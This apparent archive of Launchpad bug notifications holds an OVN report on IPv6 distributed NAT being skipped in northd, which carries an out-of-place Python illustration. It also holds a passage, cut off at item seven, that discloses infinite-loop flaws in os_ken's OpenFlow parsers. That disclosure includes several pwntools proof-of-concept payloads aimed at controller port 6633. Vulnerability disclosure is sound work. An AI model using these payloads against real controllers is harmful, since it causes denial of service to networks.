From 2075495 at bugs.launchpad.net  Thu Aug  1 07:59:20 2024
From: 2075495 at bugs.launchpad.net (Reason li)
Date: Thu, 01 Aug 2024 07:59:20 -0000
Subject: [Bug 2075495] [NEW] ipv6 dnat_and_snat does not work in distributed mode
Message-ID: <172249916087.239635.12262043580499860531.malonedeb@juju-98d295-prod-launchpad-7>

Public bug reported:

Description of problem:
When I use the following command to configure the ipv6 floating IP, the function does not work properly.

ovn-nbctl lr-nat-add ROUTER TYPE EXTERNAL_IP LOGICAL_IP [LOGICAL_PORT EXTERNAL_MAC]

version: main

Examples:

(ovn-sb-db)[root at control03 /]# ovn-nbctl lr-nat-add 10f6f37a-afb3-46a9-9aa6-91371cdeba1c dnat_and_snat 3333::8f fa16::f816:3eff:fe80:fb38 744e11a6-aa99-4b56-9258-e5429bed043b fa:16:3e:19:ba:cc

(ovn-sb-db)[root at control03 /]# ovn-nbctl show 10f6f37a-afb3-46a9-9aa6-91371cdeba1c
router 10f6f37a-afb3-46a9-9aa6-91371cdeba1c (neutron-278772e5-a800-4c2f-b74f-237dc7b35c8c) (aka route_test_ipv6nat)
    port lrp-44f7bde4-5ecd-44fd-8b95-d87fe60dd750
        mac: "fa:16:3e:58:c8:02"
        networks: ["fa16::1/64"]
    port lrp-d135efaa-ff60-4047-a512-24fe592ebb6a
        mac: "fa:16:3e:f0:f3:d0"
        networks: ["123.123.0.1/24"]
    port lrp-3e9af04c-1e53-42e8-943a-b46ecec15fbe
        mac: "fa:16:3e:19:ba:35"
        networks: ["192.168.0.106/24", "3333::d1/120"]
        gateway chassis: [324e165cbbeefd8f611f8d6ad0ccca6c e4d7d407ee471b88ffe74fc779a26fcf 41ada164f3652920346ca3ed20e6513d]
    nat 8c503bae-a471-4b2f-87ce-2ab585460bee
        external ip: "3333::8f"
        logical ip: "fa16::f816:3eff:fe80:fb38"
        type: "dnat_and_snat"

(ovn-sb-db)[root at control03 /]# ovn-nbctl list nat
_uuid               : 8c503bae-a471-4b2f-87ce-2ab585460bee
allowed_ext_ips     : []
exempted_ext_ips    : []
external_ids        : {}
external_ip         : "3333::8f"
external_mac        : "fa:16:3e:19:ba:cc"
external_port_range : ""
gateway_port        : []
logical_ip          : "fa16::f816:3eff:fe80:fb38"
logical_port        : "744e11a6-aa99-4b56-9258-e5429bed043b"
options             : {stateless="false"}
type                : dnat_and_snat

Everything works fine up to this point, so keep
checking ovn-sb's table Port_Binding:

(ovn-sb-db)[root at control03 /]# ovn-sbctl list port_binding 4b4ccff5-f030-4c66-b6eb-b7dd43db4f2c
_uuid               : 4b4ccff5-f030-4c66-b6eb-b7dd43db4f2c
additional_chassis  : []
additional_encap    : []
chassis             : []
datapath            : b92d5cbf-08a4-49c1-ae24-3a0d7b0b1782
encap               : []
external_ids        : {"neutron:cidrs"="192.168.0.106/24 3333::d1/120", "neutron:device_id"="278772e5-a800-4c2f-b74f-237dc7b35c8c", "neutron:device_owner"="network:router_gateway", "neutron:network_name"=neutron-b6546c61-312a-47ac-9124-d19c9b871e92, "neutron:port_name"="", "neutron:project_id"="", "neutron:revision_number"="51", "neutron:security_group_ids"=""}
gateway_chassis     : []
ha_chassis_group    : []
logical_port        : "3e9af04c-1e53-42e8-943a-b46ecec15fbe"
mac                 : [router]
nat_addresses       : ["fa:16:3e:19:ba:35 192.168.0.106 is_chassis_resident(\"cr-lrp-3e9af04c-1e53-42e8-943a-b46ecec15fbe\")"]
options             : {peer=lrp-3e9af04c-1e53-42e8-943a-b46ecec15fbe}
parent_port         : []
port_security       : []
requested_additional_chassis: []
requested_chassis   : []
tag                 : []
tunnel_key          : 3
type                : patch
up                  : false
virtual_parent      : []

I found that nat_addresses has no IPv6 information. It should also contain something like:

"fa:16:3e:19:ba:cc 3333::8f is_chassis_resident(\"744e11a6-aa99-4b56-9258-e5429bed043b\")"

When I add the missing entry to nat_addresses by hand, the IPv6 distributed floating IP becomes functional, so I think there's something wrong with ovn-northd. Reading the code in northd.c, I see that the get_nat_addresses function only checks the external_ip address in IPv4 format. Is this why the IPv6 configuration was skipped?

northd.c, line 2381:

static char **
get_nat_addresses(const struct ovn_port *op, size_t *n, bool routable_only,
                  bool include_lb_ips,
                  const struct lr_stateful_record *lr_stateful_rec)
{
    ......
    /* Get NAT IP addresses. */
    for (size_t i = 0; i < op->od->nbr->n_nat; i++) {
        ......
        char *error = ip_parse_masked(nat->external_ip, &ip, &mask);
        if (error || mask != OVS_BE32_MAX) {
            free(error);
            continue;
        }

I think IPv6 address verification should be added here. Please kindly confirm this problem.

** Affects: ovn (Ubuntu)
     Importance: Undecided
         Status: New

** Tags: ovn

-- 
You received this bug notification because you are a member of Ubuntu
OpenStack, which is subscribed to ovn in Ubuntu.
https://bugs.launchpad.net/bugs/2075495

Title:
  ipv6 dnat_and_snat does not work in distributed mode

Status in ovn package in Ubuntu:
  New

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/ovn/+bug/2075495/+subscriptions

From 2075495 at bugs.launchpad.net  Thu Aug  1 08:11:02 2024
From: 2075495 at bugs.launchpad.net (Reason li)
Date: Thu, 01 Aug 2024 08:11:02 -0000
Subject: [Bug 2075495] Re: ipv6 dnat_and_snat does not work in distributed mode
References: <172249916087.239635.12262043580499860531.malonedeb@juju-98d295-prod-launchpad-7>
Message-ID: <172249986369.1179113.17946428313968562690.launchpad@juju-98d295-prod-launchpad-4>

** Description changed:

  Description of problem:
- When I use the following command to configure the ipv6 floating IP, the function does not work properly.
+ When I use the following command to configure the ipv6 distributed floating IP, the function does not work properly.
ovn-nbctl lr-nat-add ROUTER TYPE EXTERNAL_IP LOGICAL_IP [LOGICAL_PORT EXTERNAL_MAC] version: main Examples: (ovn-sb-db)[root at control03 /]# ovn-nbctl lr-nat-add 10f6f37a-afb3-46a9-9aa6-91371cdeba1c dnat_and_snat 3333::8f fa16::f816:3eff:fe80:fb38 744e11a6-aa99-4b56-9258-e5429bed043b fa:16:3e:19:ba:cc (ovn-sb-db)[root at control03 /]# ovn-nbctl show 10f6f37a-afb3-46a9-9aa6-91371cdeba1c router 10f6f37a-afb3-46a9-9aa6-91371cdeba1c (neutron-278772e5-a800-4c2f-b74f-237dc7b35c8c) (aka route_test_ipv6nat) - port lrp-44f7bde4-5ecd-44fd-8b95-d87fe60dd750 - mac: "fa:16:3e:58:c8:02" - networks: ["fa16::1/64"] - port lrp-d135efaa-ff60-4047-a512-24fe592ebb6a - mac: "fa:16:3e:f0:f3:d0" - networks: ["123.123.0.1/24"] - port lrp-3e9af04c-1e53-42e8-943a-b46ecec15fbe - mac: "fa:16:3e:19:ba:35" - networks: ["192.168.0.106/24", "3333::d1/120"] - gateway chassis: [324e165cbbeefd8f611f8d6ad0ccca6c e4d7d407ee471b88ffe74fc779a26fcf 41ada164f3652920346ca3ed20e6513d] - nat 8c503bae-a471-4b2f-87ce-2ab585460bee - external ip: "3333::8f" - logical ip: "fa16::f816:3eff:fe80:fb38" - type: "dnat_and_snat" +     port lrp-44f7bde4-5ecd-44fd-8b95-d87fe60dd750 +         mac: "fa:16:3e:58:c8:02" +         networks: ["fa16::1/64"] +     port lrp-d135efaa-ff60-4047-a512-24fe592ebb6a +         mac: "fa:16:3e:f0:f3:d0" +         networks: ["123.123.0.1/24"] +     port lrp-3e9af04c-1e53-42e8-943a-b46ecec15fbe +         mac: "fa:16:3e:19:ba:35" +         networks: ["192.168.0.106/24", "3333::d1/120"] +         gateway chassis: [324e165cbbeefd8f611f8d6ad0ccca6c e4d7d407ee471b88ffe74fc779a26fcf 41ada164f3652920346ca3ed20e6513d] +     nat 8c503bae-a471-4b2f-87ce-2ab585460bee +         external ip: "3333::8f" +         logical ip: "fa16::f816:3eff:fe80:fb38" +         type: "dnat_and_snat" (ovn-sb-db)[root at control03 /]# ovn-nbctl list nat _uuid : 8c503bae-a471-4b2f-87ce-2ab585460bee allowed_ext_ips : [] exempted_ext_ips : [] external_ids : {} external_ip : "3333::8f" external_mac : "fa:16:3e:19:ba:cc" 
external_port_range : "" gateway_port : [] logical_ip : "fa16::f816:3eff:fe80:fb38" logical_port : "744e11a6-aa99-4b56-9258-e5429bed043b" options : {stateless="false"} type : dnat_and_snat Everything works fine up to this point, so keep checking ovn-sb's table port_binding (ovn-sb-db)[root at control03 /]# ovn-sbctl list port_binding 4b4ccff5-f030-4c66-b6eb-b7dd43db4f2c _uuid : 4b4ccff5-f030-4c66-b6eb-b7dd43db4f2c additional_chassis : [] additional_encap : [] chassis : [] datapath : b92d5cbf-08a4-49c1-ae24-3a0d7b0b1782 encap : [] external_ids : {"neutron:cidrs"="192.168.0.106/24 3333::d1/120", "neutron:device_id"="278772e5-a800-4c2f-b74f-237dc7b35c8c", "neutron:device_owner"="network:router_gateway", "neutron:network_name"=neutron-b6546c61-312a-47ac-9124-d19c9b871e92, "neutron:port_name"="", "neutron:project_id"="", "neutron:revision_number"="51", "neutron:security_group_ids"=""} gateway_chassis : [] ha_chassis_group : [] logical_port : "3e9af04c-1e53-42e8-943a-b46ecec15fbe" mac : [router] nat_addresses : ["fa:16:3e:19:ba:35 192.168.0.106 is_chassis_resident(\"cr-lrp-3e9af04c-1e53-42e8-943a-b46ecec15fbe\")"] options : {peer=lrp-3e9af04c-1e53-42e8-943a-b46ecec15fbe} parent_port : [] port_security : [] requested_additional_chassis: [] requested_chassis : [] tag : [] tunnel_key : 3 type : patch up : false virtual_parent : [] I found that nat_addresses has no information about ipv6 nat_addresses should have something like this "fa:16:3e:19:ba:cc 3333::8f is_chassis_resident(\"744e11a6-aa99-4b56-9258-e5429bed043b\")" I add what is missing above to nat_addresses by hand,then ipv6 distributed floating IP is functional So I think there's something wrong with ovn-northd. Reading the code in northd.c, I see that the get_nat_addresses function only checks the external_ip address in IPV4 format.Is this why the ipv6 configuration was skipped? 
northd.c Line 2381 static char ** get_nat_addresses(const struct ovn_port *op, size_t *n, bool routable_only, - bool include_lb_ips, - const struct lr_stateful_record *lr_stateful_rec) +                   bool include_lb_ips, +                   const struct lr_stateful_record *lr_stateful_rec) { ...... - /* Get NAT IP addresses. */ - for (size_t i = 0; i < op->od->nbr->n_nat; i++) { - ...... - char *error = ip_parse_masked(nat->external_ip, &ip, &mask); - if (error || mask != OVS_BE32_MAX) { - free(error); - continue; - } +     /* Get NAT IP addresses. */ +     for (size_t i = 0; i < op->od->nbr->n_nat; i++) { +         ...... +         char *error = ip_parse_masked(nat->external_ip, &ip, &mask); +         if (error || mask != OVS_BE32_MAX) { +             free(error); +             continue; +         } I think IPV6 address verification should be added here. Please kindly confirm this problem ** Description changed: Description of problem: When I use the following command to configure the ipv6 distributed floating IP, the function does not work properly. 
ovn-nbctl lr-nat-add ROUTER TYPE EXTERNAL_IP LOGICAL_IP [LOGICAL_PORT EXTERNAL_MAC] version: main Examples: - (ovn-sb-db)[root at control03 /]# ovn-nbctl lr-nat-add 10f6f37a-afb3-46a9-9aa6-91371cdeba1c dnat_and_snat 3333::8f fa16::f816:3eff:fe80:fb38 744e11a6-aa99-4b56-9258-e5429bed043b fa:16:3e:19:ba:cc + # ovn-nbctl lr-nat-add 10f6f37a-afb3-46a9-9aa6-91371cdeba1c dnat_and_snat 3333::8f fa16::f816:3eff:fe80:fb38 744e11a6-aa99-4b56-9258-e5429bed043b fa:16:3e:19:ba:cc - (ovn-sb-db)[root at control03 /]# ovn-nbctl show 10f6f37a-afb3-46a9-9aa6-91371cdeba1c + # ovn-nbctl show 10f6f37a-afb3-46a9-9aa6-91371cdeba1c router 10f6f37a-afb3-46a9-9aa6-91371cdeba1c (neutron-278772e5-a800-4c2f-b74f-237dc7b35c8c) (aka route_test_ipv6nat)     port lrp-44f7bde4-5ecd-44fd-8b95-d87fe60dd750         mac: "fa:16:3e:58:c8:02"         networks: ["fa16::1/64"]     port lrp-d135efaa-ff60-4047-a512-24fe592ebb6a         mac: "fa:16:3e:f0:f3:d0"         networks: ["123.123.0.1/24"]     port lrp-3e9af04c-1e53-42e8-943a-b46ecec15fbe         mac: "fa:16:3e:19:ba:35"         networks: ["192.168.0.106/24", "3333::d1/120"]         gateway chassis: [324e165cbbeefd8f611f8d6ad0ccca6c e4d7d407ee471b88ffe74fc779a26fcf 41ada164f3652920346ca3ed20e6513d]     nat 8c503bae-a471-4b2f-87ce-2ab585460bee         external ip: "3333::8f"         logical ip: "fa16::f816:3eff:fe80:fb38"         type: "dnat_and_snat" - (ovn-sb-db)[root at control03 /]# ovn-nbctl list nat + # ovn-nbctl list nat _uuid : 8c503bae-a471-4b2f-87ce-2ab585460bee allowed_ext_ips : [] exempted_ext_ips : [] external_ids : {} external_ip : "3333::8f" external_mac : "fa:16:3e:19:ba:cc" external_port_range : "" gateway_port : [] logical_ip : "fa16::f816:3eff:fe80:fb38" logical_port : "744e11a6-aa99-4b56-9258-e5429bed043b" options : {stateless="false"} type : dnat_and_snat Everything works fine up to this point, so keep checking ovn-sb's table port_binding - (ovn-sb-db)[root at control03 /]# ovn-sbctl list port_binding 
4b4ccff5-f030-4c66-b6eb-b7dd43db4f2c + # ovn-sbctl list port_binding 4b4ccff5-f030-4c66-b6eb-b7dd43db4f2c _uuid : 4b4ccff5-f030-4c66-b6eb-b7dd43db4f2c additional_chassis : [] additional_encap : [] chassis : [] datapath : b92d5cbf-08a4-49c1-ae24-3a0d7b0b1782 encap : [] external_ids : {"neutron:cidrs"="192.168.0.106/24 3333::d1/120", "neutron:device_id"="278772e5-a800-4c2f-b74f-237dc7b35c8c", "neutron:device_owner"="network:router_gateway", "neutron:network_name"=neutron-b6546c61-312a-47ac-9124-d19c9b871e92, "neutron:port_name"="", "neutron:project_id"="", "neutron:revision_number"="51", "neutron:security_group_ids"=""} gateway_chassis : [] ha_chassis_group : [] logical_port : "3e9af04c-1e53-42e8-943a-b46ecec15fbe" mac : [router] nat_addresses : ["fa:16:3e:19:ba:35 192.168.0.106 is_chassis_resident(\"cr-lrp-3e9af04c-1e53-42e8-943a-b46ecec15fbe\")"] options : {peer=lrp-3e9af04c-1e53-42e8-943a-b46ecec15fbe} parent_port : [] port_security : [] requested_additional_chassis: [] requested_chassis : [] tag : [] tunnel_key : 3 type : patch up : false virtual_parent : [] I found that nat_addresses has no information about ipv6 nat_addresses should have something like this "fa:16:3e:19:ba:cc 3333::8f is_chassis_resident(\"744e11a6-aa99-4b56-9258-e5429bed043b\")" - I add what is missing above to nat_addresses by hand,then ipv6 - distributed floating IP is functional + I shut down ovn-northd for now and add what is missing above to + nat_addresses by hand,then ipv6 distributed floating IP is functional. So I think there's something wrong with ovn-northd. Reading the code in northd.c, I see that the get_nat_addresses function only checks the external_ip address in IPV4 format.Is this why the ipv6 configuration was skipped? northd.c Line 2381 static char ** get_nat_addresses(const struct ovn_port *op, size_t *n, bool routable_only,                   bool include_lb_ips,                   const struct lr_stateful_record *lr_stateful_rec) { ......     /* Get NAT IP addresses. 
 */
     for (size_t i = 0; i < op->od->nbr->n_nat; i++) {
         ......
         char *error = ip_parse_masked(nat->external_ip, &ip, &mask);
         if (error || mask != OVS_BE32_MAX) {
             free(error);
             continue;
         }

 I think IPV6 address verification should be added here. Please kindly
 confirm this problem

-- 
You received this bug notification because you are a member of Ubuntu
OpenStack, which is subscribed to ovn in Ubuntu.
https://bugs.launchpad.net/bugs/2075495

Title:
  ipv6 dnat_and_snat does not work in distributed mode

Status in ovn package in Ubuntu:
  New

Bug description:
  Description of problem:
  When I use the following command to configure the ipv6 distributed
  floating IP, the function does not work properly.

  ovn-nbctl lr-nat-add ROUTER TYPE EXTERNAL_IP LOGICAL_IP [LOGICAL_PORT EXTERNAL_MAC]

  version: main

  Examples:

  # ovn-nbctl lr-nat-add 10f6f37a-afb3-46a9-9aa6-91371cdeba1c dnat_and_snat 3333::8f fa16::f816:3eff:fe80:fb38 744e11a6-aa99-4b56-9258-e5429bed043b fa:16:3e:19:ba:cc

  # ovn-nbctl show 10f6f37a-afb3-46a9-9aa6-91371cdeba1c
  router 10f6f37a-afb3-46a9-9aa6-91371cdeba1c (neutron-278772e5-a800-4c2f-b74f-237dc7b35c8c) (aka route_test_ipv6nat)
      port lrp-44f7bde4-5ecd-44fd-8b95-d87fe60dd750
          mac: "fa:16:3e:58:c8:02"
          networks: ["fa16::1/64"]
      port lrp-d135efaa-ff60-4047-a512-24fe592ebb6a
          mac: "fa:16:3e:f0:f3:d0"
          networks: ["123.123.0.1/24"]
      port lrp-3e9af04c-1e53-42e8-943a-b46ecec15fbe
          mac: "fa:16:3e:19:ba:35"
          networks: ["192.168.0.106/24", "3333::d1/120"]
          gateway chassis: [324e165cbbeefd8f611f8d6ad0ccca6c e4d7d407ee471b88ffe74fc779a26fcf 41ada164f3652920346ca3ed20e6513d]
      nat 8c503bae-a471-4b2f-87ce-2ab585460bee
          external ip: "3333::8f"
          logical ip: "fa16::f816:3eff:fe80:fb38"
          type: "dnat_and_snat"

  # ovn-nbctl list nat
  _uuid               : 8c503bae-a471-4b2f-87ce-2ab585460bee
  allowed_ext_ips     : []
  exempted_ext_ips    : []
  external_ids        : {}
  external_ip         : "3333::8f"
  external_mac        : "fa:16:3e:19:ba:cc"
  external_port_range : ""
  gateway_port        : []
  logical_ip          : "fa16::f816:3eff:fe80:fb38"
  logical_port        : "744e11a6-aa99-4b56-9258-e5429bed043b"
  options             : {stateless="false"}
  type                : dnat_and_snat

  Everything works fine up to this point, so keep checking ovn-sb's
  table Port_Binding:

  # ovn-sbctl list port_binding 4b4ccff5-f030-4c66-b6eb-b7dd43db4f2c
  _uuid               : 4b4ccff5-f030-4c66-b6eb-b7dd43db4f2c
  additional_chassis  : []
  additional_encap    : []
  chassis             : []
  datapath            : b92d5cbf-08a4-49c1-ae24-3a0d7b0b1782
  encap               : []
  external_ids        : {"neutron:cidrs"="192.168.0.106/24 3333::d1/120", "neutron:device_id"="278772e5-a800-4c2f-b74f-237dc7b35c8c", "neutron:device_owner"="network:router_gateway", "neutron:network_name"=neutron-b6546c61-312a-47ac-9124-d19c9b871e92, "neutron:port_name"="", "neutron:project_id"="", "neutron:revision_number"="51", "neutron:security_group_ids"=""}
  gateway_chassis     : []
  ha_chassis_group    : []
  logical_port        : "3e9af04c-1e53-42e8-943a-b46ecec15fbe"
  mac                 : [router]
  nat_addresses       : ["fa:16:3e:19:ba:35 192.168.0.106 is_chassis_resident(\"cr-lrp-3e9af04c-1e53-42e8-943a-b46ecec15fbe\")"]
  options             : {peer=lrp-3e9af04c-1e53-42e8-943a-b46ecec15fbe}
  parent_port         : []
  port_security       : []
  requested_additional_chassis: []
  requested_chassis   : []
  tag                 : []
  tunnel_key          : 3
  type                : patch
  up                  : false
  virtual_parent      : []

  I found that nat_addresses has no IPv6 information. It should also
  contain something like:

  "fa:16:3e:19:ba:cc 3333::8f is_chassis_resident(\"744e11a6-aa99-4b56-9258-e5429bed043b\")"

  I shut down ovn-northd for now and added the missing entry to
  nat_addresses by hand; the IPv6 distributed floating IP then became
  functional. So I think there's something wrong with ovn-northd.
  Reading the code in northd.c, I see that the get_nat_addresses
  function only checks the external_ip address in IPv4 format. Is this
  why the IPv6 configuration was skipped?
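  The family-aware validation being requested can be illustrated with a
  short Python sketch using only the stdlib ipaddress module. This is an
  illustration of the proposed logic, not the actual OVN patch (the real
  fix would be C inside get_nat_addresses(); the function name below is
  hypothetical): accept a fully-specified external_ip of either address
  family instead of only IPv4.

  ```python
  import ipaddress

  def external_ip_is_usable(external_ip: str) -> bool:
      """Accept a NAT external_ip that is a plain host address in either
      family. The quoted C code only tries the IPv4 parse, so an IPv6
      address such as "3333::8f" is silently skipped."""
      try:
          ipaddress.ip_address(external_ip)  # parses both IPv4 and IPv6
          return True
      except ValueError:
          return False
  ```

  With this logic "192.168.0.106" and "3333::8f" both pass, while a
  masked prefix such as "3333::/120" is still rejected, mirroring the
  mask != OVS_BE32_MAX condition used for IPv4.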
  northd.c, line 2381:

  static char **
  get_nat_addresses(const struct ovn_port *op, size_t *n, bool routable_only,
                    bool include_lb_ips,
                    const struct lr_stateful_record *lr_stateful_rec)
  {
      ......
      /* Get NAT IP addresses. */
      for (size_t i = 0; i < op->od->nbr->n_nat; i++) {
          ......
          char *error = ip_parse_masked(nat->external_ip, &ip, &mask);
          if (error || mask != OVS_BE32_MAX) {
              free(error);
              continue;
          }

  I think IPv6 address verification should be added here. Please kindly
  confirm this problem.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/ovn/+bug/2075495/+subscriptions

From 2067973 at bugs.launchpad.net  Thu Aug  1 11:26:16 2024
From: 2067973 at bugs.launchpad.net (OpenStack Infra)
Date: Thu, 01 Aug 2024 11:26:16 -0000
Subject: [Bug 2067973] Fix included in openstack/os-ken 2.6.1
References: <171746781446.2640504.17587973679163791137.malonedeb@juju-98d295-prod-launchpad-7>
Message-ID: <172251157679.74921.9416650014801481008.malone@juju-98d295-prod-launchpad-2>

This issue was fixed in the openstack/os-ken 2.6.1 release.

-- 
You received this bug notification because you are a member of Ubuntu
OpenStack, which is subscribed to python-os-ken in Ubuntu.
https://bugs.launchpad.net/bugs/2067973

Title:
  A series of infinite loop vulnerabilities in the os_ken

Status in DragonFlow:
  New
Status in neutron:
  Fix Released
Status in os-ryu:
  New
Status in OpenStack Security Advisory:
  Won't Fix
Status in python-os-ken package in Ubuntu:
  New

Bug description:
  Hello,

  We have recently discovered a series of infinite loop vulnerabilities
  in the os_ken component. Initially, our team found this issue in ryu
  and submitted several issues there, but we realized that ryu has not
  been maintained for a long time. We later found out that this project
  is still being maintained, so we submitted the issue here.
We believe that this set of issues with os_ken as a component of the OpenFlow protocol could lead to a denial of service due to malicious attacks on controllers such as ryu and faucet, which are currently using the component, as well as other controllers based on the component. We believe that once the controller is attacked and enters a denial of service state, the switch will not function properly. Relevant details are given below: [1] OFPTableFeaturesStats parser ```python         while rest:             p, rest = OFPTableFeatureProp.parse(rest)             props.append(p)         table_features.properties = props ``` The rest variable here is obtained through the following code: ```python         (type_, length) = struct.unpack_from(cls._PACK_STR, buf, 0)         rest = buf[utils.round_up(length, 8):] ``` If the length variable is tampered with to 0, rest will get the original buffer, causing the controller to fall into an infinite loop. poc: ```python from pwn import * p=remote("0.0.0.0",6633) payload="\x04\x13\x00\x58\x00\x00\x00\x00\x00\x0c\x00\x01\x00\x00\x00\x0000\x48\x01\x00\x00\x00\x00\x00\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00" p.send(payload) p.interactive() ``` [2] OFPHello parser ```python class OFPHello(MsgBase): ...     @classmethod     def parser(cls, datapath, version, msg_type, msg_len, xid, buf):         msg = super(OFPHello, cls).parser(datapath, version, msg_type,                                           msg_len, xid, buf)         offset = ofproto.OFP_HELLO_HEADER_SIZE         elems = []         while offset < msg.msg_len:             type_, length = struct.unpack_from(                 ofproto.OFP_HELLO_ELEM_HEADER_PACK_STR, msg.buf, offset)             ...             
offset += length         msg.elements = elems         return msg ``` If the variable length is equal to 0,the offset will no longer change and the parsing will fall into an infinite loop. poc: ```python from pwn import * p=remote("0.0.0.0",6633) payload="04000010000000130001000000000010" payload=bytes.fromhex(payload) p.send(payload) p.interactive() ``` [3] OFPBucket parser ```python class OFPBucket(StringifyMixin):     @classmethod     def parser(cls, buf, offset):         (len_, weight, watch_port, watch_group) = struct.unpack_from(             ofproto.OFP_BUCKET_PACK_STR, buf, offset)         ....         while length < msg.len:             action = OFPAction.parser(buf, offset)             msg.actions.append(action)             offset += action.len             length += action.len ``` If action.len=0,the offset and length will no longer change and the parsing will fall into an infinite loop. poc: ```python from pwn import * p=remote("0.0.0.0",6633) payload="\x04\x13\x00\x38\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x0000\x28\x00\x00\x00\x00\x00\x00\x00\x20\x00\x01\xff\xff\xff\xffff\xff\xff\xff\x00\x00\x00\x00\x00\x19\x00\x00\x80\x00\x08\x0600\x00\x00\x00\x00\x00\x00\x00" p.send(payload) p.interactive() ``` [4] OFPGroupDescStats parser ```python class OFPGroupDescStats(StringifyMixin):     @classmethod     def parser(cls, buf, offset):     ....         while length < stats.length:             bucket = OFPBucket.parser(buf, offset)             stats.buckets.append(bucket)             offset += bucket.len             length += bucket.len ``` If OFPBucket.len=0,the offset and length will no longer change and the parsing will fall into an infinite loop. 
poc: ```python from pwn import * p=remote("0.0.0.0",6633) brk=b"\x04\x13\x00\x38\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00" brk+=b"\x00\x28\x00\x00" brk+=b"\x00\x00\x00\x00" bucket="00000001ffffffffffffffff000000000000001000000001ffe5000000000000" brk+=bytes.fromhex(bucket) p.send(brk) p.interactive() ``` [5] OFPFlowStats parser ```python class OFPFlowStats(StringifyMixin):         while inst_length > 0:             inst = OFPInstruction.parser(buf, offset)             instructions.append(inst)             offset += inst.len             inst_length -= inst.len ``` If inst.length =0,the offset will no longer change and the parsing will fall into an infinite loop. poc: ```python from pwn import * p=remote("0.0.0.0",6633) payload=b'\x04\x13\x010\x7f\xf9\xb1m\x00\x01\x00\x00\x00\x00\x00\x00\x00h\x00\x00\x00\x00\x00\x03\x06B,@\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xc4\x00\x01\x00 \x80\x00\x00\x04\x00\x00\x00\x02\x80\x00\x08\x06\xd2\xfc:\xb8S\xf8\x80\x00\x06\x06\xce\x8f\xb2F\xcb[\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x01\xff\xe5\x00\x00\x00\x00\x00\x00\x00h\x00\x00\x00\x00\x00\x03\x06\x05#@\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00b\x00\x01\x00 \x80\x00\x00\x04\x00\x00\x00\x01\x80\x00\x08\x06\xce\x8f\xb2F\xcb[\x80\x00\x06\x06\xd2\xfc:\xb8S\xf8\x00\x04\x00\x18\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x02\xff\xe5\x00\x00\x00\x00\x00\x00\x00P\x00\x00\x00\x00\x00\x058\x81U\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x04@\x00\x01\x00\x04\x00\x00\x00\x00\x00\x04\x00\x18\x00\x00\x00\x00\x00\x00\x00\x10\xff\xff\xff\xfd\xff\xff\x00\x00\x00\x00\x00\x00' p.send(payload) p.interactive() ``` [6] OFPMultipartReply parser ```python class OFPMultipartReply(MsgBase): 
    _STATS_MSG_TYPES = {}
    ....
    @classmethod
    def parser(cls, datapath, version, msg_type, msg_len, xid, buf):
    ....
            while offset < msg_len:
                b = stats_type_cls.cls_stats_body_cls.parser(msg.buf, offset)
                body.append(b)
                offset += b.length if hasattr(b, 'length') else b.len
    ....
```

If b.length == 0, the offset no longer changes and the parsing falls into an infinite loop.

poc:

```python
from pwn import *
p = remote("0.0.0.0", 6633)
payload = "\x04\x13\x01\x30\x7f\xf9\xb1\x6d\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x06\x42\x2c\x40\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xc4\x00\x01\x00\x20\x80\x00\x00\x04\x00\x00\x00\x02\x80\x00\x08\x06\xd2\xfc\x3a\xb8\x53\xf8\x80\x00\x06\x06\xce\x8f\xb2\x46\xcb\x5b\x00\x04\x00\x18\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x01\xff\xe5\x00\x00\x00\x00\x00\x00\x00\x68\x00\x00\x00\x00\x00\x03\x06\x05\x23\x40\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x62\x00\x01\x00\x20\x80\x00\x00\x04\x00\x00\x00\x01\x80\x00\x08\x06\xce\x8f\xb2\x46\xcb\x5b\x80\x00\x06\x06\xd2\xfc\x3a\xb8\x53\xf8\x00\x04\x00\x18\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x02\xff\xe5\x00\x00\x00\x00\x00\x00\x00\x50\x00\x00\x00\x00\x00\x05\x38\x81\x55\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x04\x40\x00\x01\x00\x04\x00\x00\x00\x00\x00\x04\x00\x18\x00\x00\x00\x00\x00\x00\x00\x10\xff\xff\xff\xfd\xff\xff\x00\x00\x00\x00\x00\x00"
p.send(payload)
p.interactive()
```

[7] OFPMultipartReply parser

```python
class OFPMultipartReply(MsgBase):
    _STATS_MSG_TYPES = {}
    ....
    @classmethod
    def parser(cls, datapath, version, msg_type, msg_len, xid, buf):
    ....
            while offset < msg_len:
                b = stats_type_cls.cls_stats_body_cls.parser(msg.buf, offset)
                body.append(b)
